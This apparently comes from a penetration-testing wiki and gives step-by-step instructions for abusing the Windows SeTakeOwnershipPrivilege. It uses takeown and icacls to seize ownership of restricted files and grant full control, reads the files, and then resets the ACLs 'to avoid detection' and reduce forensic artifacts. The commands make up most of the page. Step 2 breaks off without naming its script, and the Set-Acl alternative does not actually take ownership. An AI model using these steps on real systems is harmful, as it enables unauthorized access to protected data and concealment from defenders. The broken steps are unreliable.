Exploiting SeTakeOwnershipPrivilege

Overview

SeTakeOwnershipPrivilege allows a user to take ownership of files and folders, enabling modification of access control lists (ACLs) to gain unauthorized access to restricted data.

Approach

1. Verify Privileges

whoami /priv  # Check for SeTakeOwnershipPrivilege

2. Enable Privilege (if required)

Use PowerShell scripts such as:

3. Identify Target Files/Folders

Locate sensitive files and gather metadata:

Get-ChildItem -Path <directory> -Recurse  # Enumerate files
cmd /c dir /q  # Check file owner

4. Take Ownership of Target File

takeown /f <target>

OR using PowerShell:

Set-Acl -Path <target> -AclObject (Get-Acl <target>)

5. Modify ACLs to Gain Access

icacls <target> /grant <user>:F  # Full control to user

6. Access Data

cat <target>  # Read the file

OR:

type <target>

7. Revert Changes

Reset ownership and ACLs to avoid detection:

icacls <target> /reset

Tools & Techniques

Commands Used:

  • whoami /priv

  • takeown /f <target>

  • icacls <target> /grant <user>:F

  • Get-ChildItem

  • cmd /c dir /q

  • cat <target> / type <target>

  • Set-Acl

Tools:

  • PowerShell scripts for privilege enabling

Techniques:

  • Use SeTakeOwnershipPrivilege to gain access to restricted files/folders.

  • Modify ACLs to grant read/write permissions.

  • Revert changes post-exploitation to avoid disruption.

Notes

  • This technique requires SeTakeOwnershipPrivilege to be enabled.

  • Always revert permissions and ownership post-exploitation to reduce forensic artifacts.

Previous6.SedebugprivilegeNext3.Windows Group Privileges

Last updated